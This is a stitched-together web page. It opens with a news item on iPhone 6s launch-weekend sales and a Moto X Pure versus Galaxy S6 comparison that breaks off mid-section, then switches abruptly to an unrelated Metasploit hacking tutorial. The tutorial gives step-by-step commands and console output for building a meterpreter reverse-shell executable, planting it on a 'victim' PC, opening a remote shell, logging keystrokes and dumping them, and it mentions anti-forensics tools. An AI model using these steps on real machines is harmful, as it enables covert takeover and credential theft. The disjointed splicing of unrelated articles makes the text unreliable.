Apple just announced that it has sold 13 million iPhone 6s and iPhone 6s Plus devices over its first weekend. It’s a new record for the company as it sold 10 million units last year, and 9 million units in 2013.
Compared to last year, Apple released the iPhone 6s in 6s Plus in China on day one. It took a couple of weeks last year before the company released the iPhone 6 and 6 Plus in China. But in 2013, the iPhone 5s and 5c were available in China on launch day, meaning that it still represents a big improvement compared to two years ago.
To give you a bit of perspective, over the past three days, Apple has sold 3,000 phones per minute, or 50 devices per second. This is a massive number. Apple didn’t break out sales numbers under the new iPhone Upgrade Program, which lets you buy a phone as a service. It’s a 24-month payment plan with an option to upgrade for a new iPhone every year that starts at $32 model for the lowest iPhone 6s model.
Apple also announced that the iPhone 6s and 6s Plus will be available in 40 additional countries on October 9, starting with Italy, Mexico, Russia, Spain and Taiwan. Overall, Apple will sell the new iPhone devices in 130 countries before the end of the year. Previously, the company had already announced that it was on track to beat last year’s record given the number of pre-orders.
As a reminder, the iPhone 6s brings many under-the-hood improvements. It comes with a much better camera, a significantly faster chip, snappier Touch ID, and 3D Touch. In particular, 3D Touch is a technology that has been 5 years in the making and maychange the way you use your iPhone.

Motorola essentially invented the cell phone, but it stumbled coming into the smartphone era. It has been making some great phones in the last few years, though, and the new Moto X Pure is the latest example of that. With a competitive price and attractive features, this phone might offer a good alternative to the market leading (and more expensive) Samsung Galaxy S6. Let’s see how they compare.

Design and display

The Galaxy S6 is sleek and very clean in design, but it also looks like a lot of other phones — particularly the iPhone 6. The Moto X is more distinctive, but still recognizable as a Motorola phone. It has the same curved back and prominent front-facing speakers, whereas the GS6 has a completely flat back that doesn’t fit as nicely in your hand. It also has just one speaker on the bottom edge.
The Pure is also mildly water and dust-resistant with an IP52 rating. The GS6 doesn’t have any liquid ingress protection. I bet it would survive a quick dip, though, as it lacks a removable back panel for battery access. The Moto X is also completely sealed, but it has a microSD card slot on the SIM tray, which the GS6 lacks.
mx1
Motorola offers a wide selection of plastic, wood, and leather back panels, along with tinted metal accents, so you can design a phone in the Moto Maker online tool that looks just the way you want. The Galaxy S6 is all metal and glass, but it only comes in a few colors. These are both beautiful phones in their own way, but the Moto Maker customizations really set the Moto X apart. This is definitely one of the main selling points. If you don’t mind the glass construction, the Galaxy S6 is a much lighter phone. It’s only 132g to the Moto X Pure’s 179g.
The Moto X is much heavier because it’s simply a bigger phone. The display is 5.7-inches on the Pure, a substantial increase compared to last year’s Moto X. The Galaxy S6 is a much more modest 5.1-inches, but the size isn’t the only thing that sets them apart. Samsung uses Super AMOLED panels, and this one is fantastic. The GS6 has a 2560×1600 resolution AMOLED with very high brightness, perfect viewing angles, and vibrant, yet accurate colors. The GS6 and Note 5 have the best displays you can get on a smartphone.
GS6-1
I don’t think anyone was expecting the Moto X Pure to match the Samsung Galaxy S6 in the display department, but the company did something odd this year. The last few Motorola flagships have had AMOLED panels, but this year they switched to 1440p LCDs. This might be a cost-saving measure, but the display still looks good, though not as good as the GS6 obviously. The brightness is good enough for use outdoors and the viewing angles are above average. It reminds me very much of the LG G4’s LCD, but a bit brighter and not curved. The Moto X’s screen is bigger than the GS6, so the pixel density is lower, but both are crisp enough that you’ll never notice any difference.
Part of the Moto X’s screen real estate is eaten up by the on-screen navigation buttons. I prefer this setup personally, but there are many who swear by the physical buttons you get on the Galaxy S6. There’s also a handy fingerprint scanner in the GS6’s home button. The Moto X doesn’t have one of those.

Internals and battery life

The Moto X and Galaxy S6 are both powerful phones, but when it comes to pure horsepower, the GS6 runs away with it. This device has an octa-core Samsung Exynos 7420 system-on-a-chip (SoC) with four (LITTLE) Cortex-A53 cores and four (big) Cortex-A57 in a big.LITTLE configuration. Unlike the similarly specced Snapdragon 810, this chip manages eight cores well without aggressive thermal throttling. Motorola went with a more modest SoC, the Snapdragon 808. This is a hexa-core chip with four Cortex-A53 cores and two Cortex-A57 in a big.LITTLE configuration. The two faster cores produce less heat, so the chip doesn’t have to throttle like the more powerful 810.
In daily use, the difference in SoC power is negligible, although the GPU on the Exynos chip is faster than the one on the 808. However, the Snapdragon 808 is less power-hungry than the Exynos. Both phones also have NFC chips. It used to be that you didn’t need to specify that, but we live in interesting times (looking at you, OnePlus).
snapdragon-h1
The GS6 and the Moto X Pure both have 3GB of RAM, which is plenty to keep apps running in the background. The Motorola device has typical RAM usage for an Android device, but Samsung has insisted on tuning the system a bit differently. The GS6 will only keep a few apps in memory, then it ends the background process. It’s not the sort of thing everyone will notice, but if you’re hopping quickly between a number of apps, you might notice they need to reload too often. The Moto X doesn’t do that.
As mentioned above, both phones have sealed-in batteries, but the Motorola’s is a bit Larger at 3000mAh. The Galaxy S6 is only 2550mAh, but the screen is more efficient to make up for it. The Moto X will probably get slightly better battery life under mixed use, but screen time will be roughly the same. This is assuming the GS6 doesn’t have some sort of software glitch that screws up the battery life, which owners seem to complain about often. Both phones support quick charging, which can completely fill a drained battery in around an hour, but only the GS6 has wireless charging built-in.

Cameras

Motorola’s previous Android phones have had bad cameras. They might have been okay in some circumstances, like bright outdoor light, but The Moto X had a lot of room for improvement. Luckily, the Pure has a vastly improved 21MP image sensor with an f2.0 aperture. It doesn’t have optical image stabilization (OIS), but the software stabilization is surprisingly good. A bit of jostling won’t screw up a photo taken in medium or bright light.
Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple stepsPoint, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.
Payload: Actual code which runs on the compromised system after exploitation
Now, what Metasploit IS?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.
I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.
For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.

The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.


Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps

Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv
Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R
P.S.: The above information is just for educational purposes only. You should test it against the computer you own.